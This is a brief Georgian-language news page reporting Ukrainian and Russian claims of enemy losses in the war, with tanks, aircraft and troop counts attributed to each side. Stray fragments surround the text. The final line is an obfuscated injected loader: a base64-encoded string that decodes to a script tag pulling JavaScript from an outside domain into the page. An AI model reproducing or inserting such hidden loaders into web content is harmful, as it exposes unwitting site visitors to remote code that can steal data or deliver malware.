celsiusi
ავერსი შნაიდერი

 უკრაინა და რუსეთი ორწლიანი ომის განმავლობაში მოწინააღმდეგის მხარეს არსებული დანაკარგების შესახებ ინფორმაციას ავრცელებენ.

როგორც უკრაინის შეიარაღებული ძალების გენშტაბში აცხადებენ, რუსეთის ჯამური დანაკარგია 409 010 მებრძოლი. აქედან, მხოლოდ გასული 24 საათის განმავლობაში 770-მდე ჯარისკაცია დაღუპული. გენშტაბის ცნობით, განადგურებულია რუსეთის არმიის შემადგენლობაში არსებული: 6,534 ტანკი, 12 425 ჯავშანტექნიკა, 9 952 საარტილერიო სისტემა, 999 მრავალჯერადი სარაკეტო სისტემა, 684 საჰაერო თავდაცვის აღჭურვილობა, 340 თვითმფრინავი, 325 შვეულმფრენი, 7 659 ოპერატიულ-ტაქტიკური დანიშნულების დრონი, 1 905 ფრთოსანი რაკეტა, 25 გემი და კატარღა, ერთი წყალქვეშა ნავი, 12 988 მანქანა და ბენზინმზიდი, 1 576 ერთეული სპეცტექნიკა.

ამასთან, რუსეთის ცნობით, უკრაინული მხარის ცოცხალი ძალის დანაკარგი 436 938 სამხედროს შეადგენს, აქედან თითქმის ნახევარი ბოლო ერთ წელიწადში დაიღუპა. გასული 24 საათის განმავლობაში კი დაიღუპა 610 უკრაინელი სამხედრო, მათგან 295 დონეცკის მიმართულებაზე.

უკრაინის არსენალისთვის მიყენებული ზარალი მოიცავს: 15 188 ტანკი, 18 981 ჯავშანტექნიკა, 8 145 საარტილერიო სისტემა, 13 223 დრონი, 1 223 ზალპური ცეცხლის რეაქტიული სისტემა, 572 თვითმფრინავი, 473 საზენიტო-სარაკეტო კომპლექსი, 267 ვერტმფრენი.

272
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");